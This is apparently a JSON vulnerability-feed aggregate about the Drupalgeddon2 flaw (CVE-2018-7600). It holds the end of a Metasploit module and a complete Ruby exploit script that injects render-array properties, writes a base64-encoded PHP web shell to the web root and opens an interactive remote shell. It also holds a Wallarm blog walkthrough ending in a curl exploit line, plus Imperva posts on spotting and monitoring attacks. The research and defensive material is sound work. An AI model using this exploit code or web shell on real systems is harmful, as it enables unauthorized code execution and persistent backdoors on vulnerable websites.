[ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n\r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n\r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44482/"}, {"lastseen": "2018-05-24T14:14:19", "bulletinFamily": "exploit", "description": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution. CVE-2018-7600. Webapps exploit for PHP platform", "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "id": "EDB-ID:44449", "href": "https://www.exploit-db.com/exploits/44449/", "type": "exploitdb", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution", "sourceData": "#!/usr/bin/env ruby\r\n#\r\n# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\r\n#\r\n# Authors:\r\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\r\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\r\n#\r\n\r\n\r\nrequire 'base64'\r\nrequire 'json'\r\nrequire 'net/http'\r\nrequire 'openssl'\r\nrequire 'readline'\r\n\r\n\r\n# Settings - Proxy information (nil to disable)\r\nproxy_addr = nil\r\nproxy_port = 8080\r\n\r\n\r\n# Settings - General\r\n$useragent = \"drupalgeddon2\"\r\nwebshell = \"s.php\"\r\nwriteshell = true\r\n\r\n\r\n# Settings - Payload (we could just be happy without this, but we can do better!)\r\n#bashcmd = \"<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'\r\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\r\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Function http_post <url> [post]\r\ndef http_post(url, payload=\"\")\r\n uri = URI(url)\r\n request = Net::HTTP::Post.new(uri.request_uri)\r\n request.initialize_http_header({\"User-Agent\" => $useragent})\r\n request.body = payload\r\n return $http.request(request)\r\nend\r\n\r\n\r\n# Function gen_evil_url <cmd>\r\ndef gen_evil_url(evil, feedback=true)\r\n # PHP function to use (don't forget about disabled functions...)\r\n phpmethod = $drupalverion.start_with?('8')? \"exec\" : \"passthru\"\r\n\r\n #puts \"[*] PHP cmd: #{phpmethod}\" if feedback\r\n puts \"[*] Payload: #{evil}\" if feedback\r\n\r\n ## Check the version to match the payload\r\n # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render\r\n if $drupalverion.start_with?('8')\r\n # Method #1 - Drupal 8, mail, #post_render - response is 200\r\n url = $target + \"user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\r\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpmethod + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\r\n\r\n # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)\r\n #url = $target + \"user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\r\n #payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=\" + evil\r\n elsif $drupalverion.start_with?('7')\r\n # Method #3 - Drupal 7, name, #post_render - response is 200\r\n url = $target + \"?q=user/password&name[%23post_render][]=\" + phpmethod + \"&name[%23type]=markup&name[%23markup]=\" + evil\r\n payload = \"form_id=user_pass&_triggering_element_name=name\"\r\n else\r\n puts \"[!] Unsupported Drupal version\"\r\n exit\r\n end\r\n\r\n # Drupal v7 needs an extra value from a form\r\n if $drupalverion.start_with?('7')\r\n response = http_post(url, payload)\r\n\r\n form_build_id = response.body.match(/input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\"/).to_s().slice(/value=\"(.*)\"/, 1).to_s.strip\r\n puts \"[!] WARNING: Didn't detect form_build_id\" if form_build_id.empty?\r\n\r\n #url = $target + \"file/ajax/name/%23value/\" + form_build_id\r\n url = $target + \"?q=file/ajax/name/%23value/\" + form_build_id\r\n payload = \"form_build_id=\" + form_build_id\r\n end\r\n\r\n return url, payload\r\nend\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Quick how to use\r\nif ARGV.empty?\r\n puts \"Usage: ruby drupalggedon2.rb <target>\"\r\n puts \" ruby drupalgeddon2.rb https://example.com\"\r\n exit\r\nend\r\n# Read in values\r\n$target = ARGV[0]\r\n\r\n\r\n# Check input for protocol\r\nif not $target.start_with?('http')\r\n $target = \"http://#{target}\"\r\nend\r\n# Check input for the end\r\nif not $target.end_with?('/')\r\n $target += \"/\"\r\nend\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Banner\r\nputs \"[*] --==[::#Drupalggedon2::]==--\"\r\nputs \"-\"*80\r\nputs \"[*] Target : #{$target}\"\r\nputs \"[*] Write? : Skipping writing web shell\" if not writeshell\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Setup connection\r\nuri = URI($target)\r\n$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)\r\n\r\n\r\n# Use SSL/TLS if needed\r\nif uri.scheme == \"https\"\r\n $http.use_ssl = true\r\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\nend\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Try and get version\r\n$drupalverion = nil\r\n# Possible URLs\r\nurl = [\r\n $target + \"CHANGELOG.txt\",\r\n $target + \"core/CHANGELOG.txt\",\r\n $target + \"includes/bootstrap.inc\",\r\n $target + \"core/includes/bootstrap.inc\",\r\n]\r\n# Check all\r\nurl.each do|uri|\r\n # Check response\r\n response = http_post(uri)\r\n\r\n if response.code == \"200\"\r\n puts \"[+] Found : #{uri} (#{response.code})\"\r\n\r\n # Patched already?\r\n puts \"[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\" if response.body.include? \"SA-CORE-2018-002\"\r\n\r\n # Try and get version from the file contents\r\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\r\n\r\n # If not, try and get it from the URL\r\n $drupalverion = uri.match(/core/)? \"8.x\" : \"7.x\" if $drupalverion.empty?\r\n\r\n # Done!\r\n break\r\n elsif response.code == \"403\"\r\n puts \"[+] Found : #{uri} (#{response.code})\"\r\n\r\n # Get version from URL\r\n $drupalverion = uri.match(/core/)? \"8.x\" : \"7.x\"\r\n else\r\n puts \"[!] MISSING: #{uri} (#{response.code})\"\r\n end\r\nend\r\n\r\n\r\n# Feedback\r\nif $drupalverion\r\n status = $drupalverion.end_with?('x')? \"?\" : \"!\"\r\n puts \"[+] Drupal#{status}: #{$drupalverion}\"\r\nelse\r\n puts \"[!] Didn't detect Drupal version\"\r\n puts \"[!] Forcing Drupal v8.x attack\"\r\n $drupalverion = \"8.x\"\r\nend\r\nputs \"-\"*80\r\n\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n\r\n# Make a request, testing code execution\r\nputs \"[*] Testing: Code Execution\"\r\n# Generate a random string to see if we can echo it\r\nrandom = (0...8).map { (65 + rand(26)).chr }.join\r\nurl, payload = gen_evil_url(\"echo #{random}\")\r\nresponse = http_post(url, payload)\r\nif response.code == \"200\" and not response.body.empty?\r\n #result = JSON.pretty_generate(JSON[response.body])\r\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\r\n puts \"[+] Result : #{result}\"\r\n\r\n puts response.body.match(/#{random}/)? \"[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\" : \"[+] Target might to be exploitable?\"\r\nelse\r\n puts \"[!] Target is NOT exploitable ~ HTTP Response: #{response.code}\"\r\n exit\r\nend\r\nputs \"-\"*80\r\n\r\n\r\n# Location of web shell & used to signal if using PHP shell\r\nwebshellpath = nil\r\nprompt = \"drupalgeddon2\"\r\n# Possibles paths to try\r\npaths = [\r\n \"./\",\r\n \"./sites/default/\",\r\n \"./sites/default/files/\",\r\n]\r\n# Check all\r\npaths.each do|path|\r\n puts \"[*] Testing: File Write To Web Root (#{path})\"\r\n\r\n # Merge locations\r\n webshellpath = \"#{path}#{webshell}\"\r\n\r\n # Final command to execute\r\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\r\n\r\n # Generate evil URLs\r\n url, payload = gen_evil_url(cmd)\r\n # Make the request\r\n response = http_post(url, payload)\r\n # Check result\r\n if response.code == \"200\" and not response.body.empty?\r\n # Feedback\r\n #result = JSON.pretty_generate(JSON[response.body])\r\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\r\n puts \"[+] Result : #{result}\"\r\n\r\n # Test to see if backdoor is there (if we managed to write it)\r\n response = http_post(\"#{$target}#{webshellpath}\", \"c=hostname\")\r\n if response.code == \"200\" and not response.body.empty?\r\n puts \"[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\"\r\n break\r\n else\r\n puts \"[!] Target is NOT exploitable. No write access here!\"\r\n end\r\n else\r\n puts \"[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}\"\r\n end\r\n webshellpath = nil\r\nend if writeshell\r\nputs \"-\"*80 if writeshell\r\n\r\nif webshellpath\r\n # Get hostname for the prompt\r\n prompt = response.body.to_s.strip\r\n\r\n # Feedback\r\n puts \"[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'\"\r\nelsif writeshell\r\n puts \"[!] FAILED to find writeable folder\"\r\n puts \"[*] Dropping back to ugly shell...\"\r\nend\r\n\r\n\r\n# Stop any CTRL + C action ;)\r\ntrap(\"INT\", \"SIG_IGN\")\r\n\r\n\r\n# Forever loop\r\nloop do\r\n # Default value\r\n result = \"ERROR\"\r\n\r\n # Get input\r\n command = Readline.readline(\"#{prompt}>> \", true).to_s\r\n\r\n # Exit\r\n break if command =~ /exit/\r\n\r\n # Blank link?\r\n next if command.empty?\r\n\r\n # If PHP shell\r\n if webshellpath\r\n # Send request\r\n result = http_post(\"#{$target}#{webshell}\", \"c=#{command}\").body\r\n # Direct commands\r\n else\r\n url, payload = gen_evil_url(command, false)\r\n response = http_post(url, payload)\r\n if response.code == \"200\" and not response.body.empty?\r\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\r\n end\r\n end\r\n\r\n # Feedback\r\n puts result\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44449/"}], "wallarmlab": [{"lastseen": "2018-04-25T08:38:51", "bulletinFamily": "blog", "description": "#### New Drupal Vulnerability in Detail\n\n#### By @aLLy\n\nThe second Drupalgeddon has come! It is a new variant of a critical vulnerability in one of the most popular CMSs, which caused a big stir. This newly-discovered breach allows any unregistered user execute commands in the target system by means of a single request.\n\nThe problem is further aggravated by the fact that it puts all the most current versions of the application (7.x and 8.x branches, up to 8.5.0) under threat. The number of potentially exploitable targets is very high.\n\n### INFO\n\nThe assigned ID for the vulnerability is [CVE-2018\u20137600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>). It has the highest threat level (\u201chighly critical\u201d).\n\nThe developers have issued a [patch](<https://www.drupal.org/sa-core-2018-002>) as on March 28, 2018, however, as recently as April 12, there were still no links to PoC or the detailed description of the problem in the Drupal public domain. It should be noted that the patch suggested by the developers was also very laconic and gave no indication as to where the vulnerability could be discovered. The application is easily installed; moreover, Drupal has an official repository at Docker Hub, and the deployment of a container with the required CMS version only takes a couple of well documented commands. Personally, I like to use [JetBrains PhpStorm](<https://www.jetbrains.com/phpstorm/>) for debugging.\n\nGiven that the cat is out of the bag, let\u2019s take a critical look at this exploit and study it more closely.\n\n### **Deep Dive**\n\nFirst, let\u2019s take a look at the [patch](<https://github.com/drupal/drupal/commit/19b69fe8af55d8fac34a50563a238911b75f08f7>) which fixes the vulnerability.\n\n_Drupalgeddon 2 vulnerability patch commit_\n\nCool, isn\u2019t it? The developers have simply added filtering of all data submitted by users.\n\nHowever, this patch can shed some light on the nature of the vulnerability. Pay attention to the code of the checking procedure: the data is handled by the method sanitize, which invokes stripDangerousValues.\n\n**/core/lib/Drupal/Core/DrupalKernel.php**\n \n \n 545: public function preHandle(Request $request) { \n 546: _// Sanitize the request. \n _547: $request = RequestSanitizer::sanitize( \n 548: $request, \n 549: (array) Settings::get(RequestSanitizer::SANITIZE_WHITELIST, [])\n\n**/core/lib/Drupal/Core/Security/RequestSanitizer.php**\n \n \n 40: public static function sanitize(Request $request, $whitelist, $log_sa \n \u2026 \n 44: $request->query->replace(static::stripDangerousValues($request->q\n\nThis method, in turn, executes verification of all the submitted parameters. Zero values beginning with # and values that were not whitelisted are stripped.\n\n**/core/lib/Drupal/Core/Security/RequestSanitizer.php**\n \n \n 84: protected static function stripDangerousValues($input, array $whiteli \n 85: if (is_array($input)) { \n 86: foreach ($input as $key => $value) { \n 87: if ($key !== \u2018\u2019 && $key[0] === \u2018#\u2019 && !in_array($key, $whitelis \n 88: unset($input[$key]); \n 89: $sanitized_keys[] = $key; \n 90: } \n 91: else { \n 92: $input[$key] = static::stripDangerousValues($input[$key], $wh \n 93: } \n 94: } \n 95: } \n 96: return $input; \n 97: }\n\nWhat are those \u201cmystic\u201d parameters beginning with an pound sign? They are special placeholders for Drupal Render API. This API was introduced in the version 7.0 of the CMS and is used for rendering structured data into HTML markup.\n\nBefore the rendering phase, the data required for creating the requested page and its individual blocks is stored in the form of special arrays. This provides ample opportunities for changing the markup or the content of the page at any time during the page load or right after.\n\nRender API implements so-called Renderable Arrays (or Render Arrays). They are structured arrays, that provide data along with hints as to how this data should be rendered (presented) for the user. Keys with the hash symbol (#) are the properties used by the rendering interpreter.\n\nThere is a set number of pre-defined properties, such as form, html_tag, value, markup, etc. Most them are described in the official Forms API whitepapers.\n\nFor the purposes of studying of Drupalgeddon 2 vulnerability, we are interested in the properties which invoke call_user_func during processing. Among them are #pre_render, #post_render, #access_callback, #submit, #lazy_builder, #validate. To demonstrate how exploit works, I\u2019m using the key #post_render. The processing of this element is described in the Renderer.php.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 500: if (isset($elements[\u2018#post_render\u2019])) { \n 501: foreach ($elements[\u2018#post_render\u2019] as $callable) { \n 502: if (is_string($callable) && strpos($callable, \u2018::\u2019) === FALSE \n 503: $callable = $this->controllerResolver->getControllerFromDefi \n 504: } \n 505: $elements[\u2018#children\u2019] = call_user_func($callable, $elements[ \n 506: } \n 507: }\n\nNow we need to find a point where user data is submitted to the function render, so we can incorporate this property with the desirable parameters. It\u2019s best if we focus on points that are accessible to unauthorized users, as we know that exploitation of the vulnerability does not require authentication or rights.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 182: public function render(&$elements, $is_root_call = FALSE) { \n \u2026 \n 194: try { \n 195: return $this->doRender($elements, $is_root_call); \n \u2026 \n 207: protected function doRender(&$elements, $is_root_call = FALSE) {\n\nDrupal is huge, and search for such points can take a while, so I won\u2019t bore you with this task (given that the [Check Point](<https://www.checkpoint.com/>) experts have discovered all that there is to discover already). On registering a new user, the CMS allows you to upload anavatar.\n\nLet\u2019s create a new account and upload some picture after routing the traffic through a proxy.\n\n_User avatar upload request_\n\nThis request is processed by the ManagedFile class method uploadAjaxCallback.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n\n172: public static function uploadAjaxCallback(&$form, FormStateInterface\n\nTake a note of the element_parents parameter in the request.\n\nelement_parents=user_picture/widget/0\n\nIt is used in further processing.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n \n \n 174: $renderer = \\Drupal::service(\u2018renderer\u2019); \n 175: \n 176: $form_parents = explode(\u2018/\u2019, $request->query->get(\u2018element_parents\n\nThe submitted data is broken down by slashes and are used to retrieve data from the main form via NestedArray::getValue.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n\n179: $form = NestedArray::getValue($form, $form_parents);\n\n**/core/lib/Drupal/Component/Utility/NestedArray.php**\n \n \n 69: public static function &getValue(array &$array, array $parents, &$key \n 70: $ref = &$array; \n 71: foreach ($parents as $parent) { \n 72: if (is_array($ref) && (isset($ref[$parent]) || array_key_exists($ \n 73: $ref = &$ref[$parent]; \n 74: } \n 75: else { \n 76: $key_exists = FALSE; \n 77: $null = NULL; \n 78: return $null; \n 79: } \n 80: } \n 81: $key_exists = TRUE; \n 82: return $ref; \n 83: }\n\nAnd then, based on the received data, the resulted array is rendered.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n\n193: $output = $renderer->renderRoot($form);\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 129: public function renderRoot(&$elements) { \n 130: _// Disallow calling ::renderRoot() from within another ::renderRoo \n _131: if ($this->isRenderingRoot) { \n \u2026 \n 138: $output = $this->executeInRenderContext(new RenderContext(), funct \n 139: return $this->render($elements, TRUE); \n 140: });\n\nNow let\u2019s use a debugger to analyze what\u2019s going on here.\n\nLet\u2019s interrupt request line NestedArray::getValue.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n \n \n 176: $form_parents = explode(\u2018/\u2019, $request->query->get(\u2018element_parents \n \u2026 \n 179: $form = NestedArray::getValue($form, $form_parents); _# you\u2019re here_\n\n_Debugging of uploadAjaxCallback after uploading an avatar_\n\nThe array $form_parents received from the parameter element_parents serves as a custom path to the desired element in $form for the subsequent rendering. In my case, it looks as follows: $form[\u201cuser_picture\u201d][\u201cwidget\u201d][0]. The keys are separated by slashes, as is customary in Unix paths.\n\nYou can as easily put in your own path to the desired element \u2014 you just need to find it. Pay attention to the fields in the new account registration form, which can be filled in, namely mail and name. The parameter name. filters the user data, but the parameter name is more tolerant to such operations. Let\u2019s try to convert this parameter into an array and submit a line beginning with # as a key.\n\n_Attribute injection in the_ mail _parameter_\n \n \n $form => Array \n ( \n \u2026 \n [account] => Array \n ( \n [_#type] => container \n _[_#weight] => -10 \n _[mail] => Array \n ( \n [_#type] => email \n _[_#title] => Drupal\\Core\\StringTranslation\\TranslatableMarkup Ob \n _\u2026 \n [_#name] => mail \n _[_#value] => Array \n _( \n [_#test] => \n _) \n \u2026 \n ) \n ) \n )\n\nNow, if we take element_parents, put the value account/mail/#value in it and insert a breakpoint after the execution of NestedArray::getValue, we get a resulting renewed $form containing our parameters.\n\n_Injection of a random element and reassignment of _$form\n\nIn the next phase, we go back to the magic property #post_render and create a payload array based on this attribute. The function which must be executed is specified as the first element of the array.\n\nmail[_#post_render][] = \u2018exec\u2019_\n\nNext, we must specify the execution parameters. If you look at call_user_func, you\u2019ll see that they are taken from the property #children.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 500: if (isset($elements[\u2018#post_render\u2019])) { \n 501: foreach ($elements[\u2018#post_render\u2019] as $callable) { \n \u2026 \n 505: $elements[\u2018#children\u2019] = call_user_func($callable, $elements[\n\nLet\u2019s put them in this place.\n\nmail[_#children] = \u2018uname -a\u2019_\n\nNow, let\u2019s submit the resulting form.\n\n_Everything is set for RCE exploitation._\n\nVoila! \ud83d\ude0a\n\n_Successfully executed RCE-exploit for Drupal 8.5.0_\n\nLet\u2019s remove all the extra stuff from the query and frame it as a single-line curl command.\n\n$ curl -s -X \u2018POST\u2019 \u2014 data \u2018mail[%23post_render][]=exec&mail[%23children]=p\n\nIt\u2019s elegant and so, so easy!\n\n#### **Conclusions**\n\nWhat can I say to sum it all up?\n\nThe first red flags related to this problem were raised at the end of last year when the researcher nicknamed WhiteWinterWolf published a post in his blog about another possible scenario of Drupalgeddon exploitation. Let me remind you that the original vulnerability allowed unauthorized users to execute SQL injections.\n\nWhiteWinterWolf also provided an example of how an intruder can use this vulnerability for running remote commands after manipulating the same placeholders in an array.\n\nThe problem is highly critical for all owners of Drupal sites. Massive attacks are distinct possibility. It is very likely that cybercriminals have already added this exploit to their armory, so be proactive, write up some WAF policies and roll out relevant patches. By the way, if you don\u2019t want to upgrade, the developers have posted patches for all current Drupal branches in their official announcement.\n\nStill, the best way is to install the latest CMS versions: Drupal 7.58 for 7.x branch and Drupal 8.5.1 for 8.x. They have fixed the vulnerability in these updates, or that\u2019s what they told us, anyways.\n\n\n\n* * *\n\n[Drupalgeddon Two.](<https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "modified": "2018-04-20T19:31:22", "published": "2018-04-20T19:31:22", "href": "https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18?source=rss----49b51199b3da---4", "id": "WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE", "type": "wallarmlab", "title": "Drupalgeddon Two.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "impervablog": [{"lastseen": "2019-02-13T21:29:37", "bulletinFamily": "blog", "description": "\n\nAttacks on applications can be divided into two types: targeted attacks and \u201cspray and pray\u201d attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization\u2019s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or [sold on the dark web](<https://medium.com/beyond-the-perimeter/over-750-000-debit-and-credit-cards-for-sale-found-on-the-deep-web-434e050ac59f>). Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack. \n\nOne famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became [widely available](<https://github.com/dreadlocked/Drupalgeddon2>), which caused the [number of attacks on Drupal sites to explode](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>).\n\nThe ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.\n\n**Identifying Spray and Pray Attacks in Attack Analytics **\n\n[Attack Analytics](<https://www.imperva.com/products/attack-analytics/>), launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.\n\nWe recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below. \n\n_Figure 1: Attack Analytics Dashboard_\n\nClicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the \u201cHow common\u201d filter.\n\n_Figure 2: Attack Analytics Many Customers Filter_\n\n \n\nA closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).\n\n_Figure 3: Attack Analytics Incident Insights_\n\n**How Our Algorithm Works**\n\nThe algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:\n\n * The attack source: Network source (IP/Subnet), Geographic location\n * The attack target: URL, Host, Parameters\n * The attack time: Duration, Frequency\n * The attack type: Triggered rule\n * The attack tool: Tool name, type & parameters \n\nIn some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.\n\nAnother significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.\n\n**Results and Findings**\n\nThe Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.\n\n_Figure 4: Spray & Pray Incidents Spread _\n\nHere\u2019s an interesting example - a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We\u2019ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URLs scan on our customers resources - an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers with a [cURL](<https://www.hackingarticles.in/web-application-penetration-testing-curl/>). And the list goes on.\n\nFocusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers. \n\n_Figure 5: Single Source Spray & Pray Accounts Affected_\n\n**More Actionable Insights Coming**\n\nIdentifying spray and pray attacks is a great example of using the intelligence from Imperva\u2019s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future. \n\nThe post [How Imperva's New Attack Crowdsourcing Secures Your Business's Applications](<https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2019-02-13T12:52:46", "published": "2019-02-13T12:52:46", "id": "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "href": "https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/", "type": "impervablog", "title": "How Imperva\u2019s New Attack Crowdsourcing Secures Your Business\u2019s Applications", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-27T04:45:34", "bulletinFamily": "blog", "description": "Ever since March 28th, when Drupal published a patch for a RCE named Drupalgeddon 2.0 (SA-CORE-2018-002/[CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)), Imperva has been monitoring our cloud looking for hackers\u2019 attempts to exploit the vulnerability, but found nothing. Until today.\n\nIt somehow seems fitting that nefarious activity picked up today, Friday the 13th. After a [POC exploit](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) was released, our monitoring services showed that hackers are finally starting to catch up! Since the RCE exploit was publicly disclosed two weeks ago, they could have been working on their own exploits, but didn\u2019t.\n\n## Lazy Hackers\n\nAs usual when exploits become known, we go into hyper-awareness mode looking for security events (and of course, protecting our customers), but no events were identified. Not a single attack. We rang to some of our teammates looking for answers, asking if they deleted events, but no\u2014it\u2019s just simply that no one attempted to exploit this newfound bug and it took them two whole weeks to reverse the patch.\n\nIt appeared every one of the black hats was waiting for someone else to do the research and share the exploit. Perhaps most hackers don\u2019t care for the actual work of finding ways to exploit a vulnerability. They just wait until something is public and 